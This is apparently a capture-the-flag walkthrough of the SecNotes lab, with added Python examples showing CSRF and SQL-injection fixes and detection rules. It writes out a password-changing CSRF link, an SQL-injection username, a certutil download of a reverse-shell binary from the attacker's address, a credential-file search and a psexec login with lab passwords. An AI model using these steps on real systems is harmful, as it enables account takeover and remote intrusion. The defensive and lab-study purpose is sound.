Ping

Nmap Scans

mapit 10.10.10.97

Nmap Default Scan

Nmap Service and Script Scan

Nmap All Port Scan

Nmap Service and Script Scan for new port

On port 80 I tried the default admin passwords, but the application says there is no account named admin.

So I registered a new user test with the password test@1234 and logged in.

No SMB session

Gobuster Scan

gobuster dir -u http://10.10.10.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

Nothing interesting.

Something interesting in the Contact Us area: Tyler clicks whatever link we send him.

So we'll trick him into changing his password by sending him a malicious link. For that we need to capture the request and response of the change-password functionality.

We'll send him this crafted link. I have added my own address as a second link, just to confirm that he really clicks what he is sent.

http://10.10.10.97/change_pass.php?password=rosh@3000&confirm_password=rosh@3000&submit=submit
http://10.10.14.3:8080

I think he clicked the link; now we'll check whether the password has been changed.

But it didn't work. I don't know the reason; I checked walkthroughs and the official writeup, and for some unknown reason it didn't work for me. But I found another way to exploit this from this link: https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/
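For the change-password link above, here is an added example that is not code from the writeup or from the lab application. It models the weakness the link relies on (a handler that accepts a new password from any request carrying the victim's session cookie, with no anti-CSRF token and no check of the current password) next to a hardened handler that refuses it. The handler names, the session layout and the token scheme are assumptions for illustration.

```python
"""Added example, not from the writeup or the lab: a change-password handler
that a victim's click can drive (weak) beside one that cannot (hardened).
Names, session layout and token scheme are assumptions for illustration."""
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed server-side state: one logged-in user with one session.
USERS = {"tyler": {"password": "old-password"}}
SESSIONS = {"sess-tyler": {"user": "tyler", "csrf": secrets.token_hex(16)}}

# Same URL shape as the link in the writeup, with a constructed password value.
ATTACK_LINK = ("http://10.10.10.97/change_pass.php"
               "?password=attacker-chosen&confirm_password=attacker-chosen&submit=submit")


def reset():
    """Restore the constructed state so each scenario starts the same way."""
    USERS["tyler"]["password"] = "old-password"


def change_pass_weak(url, cookie):
    """Weak handler: the browser attaches the session cookie automatically,
    so a GET link opened by the victim is enough to set a new password."""
    sess = SESSIONS.get(cookie)
    if sess is None:
        return False
    q = parse_qs(urlparse(url).query)
    new = q.get("password", [None])[0]
    confirm = q.get("confirm_password", [None])[0]
    if not new or new != confirm:
        return False
    USERS[sess["user"]]["password"] = new
    return True


def change_pass_hardened(method, cookie, form):
    """Hardened handler: state change only over POST, with a per-session CSRF
    token that a cross-site page cannot read, and with the current password,
    which the sender of the link does not know. Values come from the POST
    body, never from the query string."""
    sess = SESSIONS.get(cookie)
    if sess is None or method != "POST":
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
        return False
    user = USERS[sess["user"]]
    if not hmac.compare_digest(form.get("current_password", ""), user["password"]):
        return False
    new, confirm = form.get("password"), form.get("confirm_password")
    if not new or new != confirm:
        return False
    user["password"] = new
    return True


if __name__ == "__main__":
    reset()
    print("weak handler accepts link:", change_pass_weak(ATTACK_LINK, "sess-tyler"))
    reset()
    forged = {"password": "x", "confirm_password": "x", "csrf_token": "forged"}
    print("hardened handler accepts forged POST:",
          change_pass_hardened("POST", "sess-tyler", forged))
```

The hardened version closes the issue in three independent ways: a GET can never change state, the token is bound to the session rather than guessable, and re-entering the current password stops anyone who only controls what the victim clicks.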

Will register an account with the username ' or 1='1 and the password ' or 1='1, then log in with the same credentials (' or 1='1:' or 1='1). This gets us into tyler's account.

Analysing the notes, found tyler's password: 92g!mA8BGjOirkL%OG&*
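Why a username of ' or 1='1 ends up showing another user's notes, as an added example that is not the lab application's code: a query that embeds the stored username by string formatting, next to the parameterised query that treats it as data. The schema and function names are assumptions about how such an app builds its notes query. One caveat for running it locally: SQLite gives literals no type affinity, so 1='1' is false there; the example therefore uses the equivalent ' or '1'='1 form, which behaves the same way in the concatenated query.

```python
"""Added example, not from the writeup or the lab: a notes query built by
string formatting (injectable) next to a bound-parameter query (safe).
Schema and names are assumptions; data is constructed."""
import sqlite3

# SQLite variant of the page's payload (see lead-in): same effect, quoted 1.
PAYLOAD = "' or '1'='1"


def make_db():
    """Constructed sample data: two users, one note each."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes (username TEXT, note TEXT)")
    db.executemany("INSERT INTO notes VALUES (?, ?)", [
        ("tyler", "reminder: password is EXAMPLE-NOT-REAL"),
        (PAYLOAD, "hello"),
    ])
    return db


def notes_vulnerable(db, username):
    """The quote in the stored username ends the literal early, so the WHERE
    clause becomes username='' or '1'='1' and every row matches."""
    sql = "SELECT note FROM notes WHERE username='%s'" % username
    return sorted(row[0] for row in db.execute(sql))


def notes_parameterised(db, username):
    """Bound parameter: the username is always data, never SQL."""
    sql = "SELECT note FROM notes WHERE username=?"
    return sorted(row[0] for row in db.execute(sql, (username,)))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, as payload user:", notes_vulnerable(db, PAYLOAD))
    print("parameterised, as payload user:", notes_parameterised(db, PAYLOAD))
```

The fix is the same whatever the backend: never splice user-controlled values into SQL text, bind them. Escaping quotes by hand is not equivalent; parameter binding keeps the query structure fixed regardless of input.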

The only other place to try this password is SMB.

smbclient -U 'tyler' -L //10.10.10.97

Now we can list the shares; we'll analyse new-site.

SMB session

smbclient \\\\10.10.10.97\\new-site\\ -U tyler

This is surely the web root of the IIS service on port 8808, so I put a cmdasp.aspx there to get RCE. It doesn't work; tried both .aspx and .asp.

Will try with simple-backdoor.php

Will Jump to Initial Foothold…!

Now we'll get a reverse shell.

certutil -urlcache -f http://10.10.14.3/rev.exe rev.exe

Will trigger that

C:\inetpub\new-site\rev.exe

I had already started my netcat listener. Got a shell.
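The foothold steps above (a PHP backdoor in the web root, certutil fetching a binary, and rev.exe started from C:\inetpub\new-site) each leave a process-creation trail. As an added example that is not part of the writeup, here is the detection logic a defender could run over such events: flag certutil downloading over HTTP, the IIS worker w3wp.exe spawning a shell, and any executable launched from under C:\inetpub. The events are constructed in a simplified key=value form (not real Sysmon or EDR output); the IP and paths are the ones from this writeup.

```python
"""Added example, not from the writeup: three process-creation rules matching
the foothold steps above, run over constructed, simplified events."""
import re

# Constructed sample events (not captured from the lab; values may contain spaces).
EVENTS = [
    "ts=1 ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c whoami",
    "ts=2 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil -urlcache -f http://10.10.14.3/rev.exe rev.exe",
    "ts=3 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\inetpub\\new-site\\rev.exe CommandLine=C:\\inetpub\\new-site\\rev.exe",
    "ts=4 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil -verify cert.cer",
    "ts=5 ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe Image=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe CommandLine=csc.exe /noconfig",
]

FIELDS = ("ts", "ParentImage", "Image", "CommandLine")
SHELLS = {"cmd.exe", "powershell.exe"}
WEB_ROOT = "c:\\inetpub\\"


def parse_event(line):
    """Split a line into fields. A new field starts at a space followed by a
    known key and '=', which keeps the spaces inside CommandLine intact."""
    parts = re.split(r" (?=(?:%s)=)" % "|".join(FIELDS), line.strip())
    return dict(part.split("=", 1) for part in parts)


def basename(path):
    """Last path component, lower-cased, for case-insensitive matching."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(event):
    """Return the names of the rules an event matches (empty list if none)."""
    image = event.get("Image", "")
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Rule 1: certutil used as a downloader rather than for certificate work.
    if basename(image) == "certutil.exe" and "-urlcache" in cmd and "http" in cmd:
        hits.append("certutil download")
    # Rule 2: the IIS worker process should not be launching shells.
    if parent == "w3wp.exe" and basename(image) in SHELLS:
        hits.append("IIS worker spawned shell")
    # Rule 3: nothing under the web root should run as a process.
    if image.lower().startswith(WEB_ROOT):
        hits.append("executable run from web root")
    return hits


def scan(lines):
    """Return (ts, [rule names]) for every event that matches at least one rule."""
    results = []
    for line in lines:
        event = parse_event(line)
        hits = analyse(event)
        if hits:
            results.append((event["ts"], hits))
    return results


if __name__ == "__main__":
    for ts, hits in scan(EVENTS):
        print(ts, ", ".join(hits))
```

The benign events (certutil verifying a certificate, w3wp.exe compiling ASP.NET pages with csc.exe) are included so the rules can be checked for false positives, not only for hits; in a real deployment the w3wp child-process rule usually needs an allow-list of exactly such compiler and helper binaries.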

User.txt

Found some files

Get-ChildItem -Path C:\Users -Include *.txt, *.log, *.kdbx, *.conf, *.ini, *.exe, *.ps1 -File -Recurse -ErrorAction SilentlyContinue

Will check our privileges

whoami /priv

Will analyse this bash.lnk

Nothing works for me in this lab, so I found the admin's password and got a session via psexec.

psexec.py "administrator:u6\!4ZwgwOM#^OBf#Nwnh"@10.10.10.97 cmd.exe

Root.txt

Not yet…!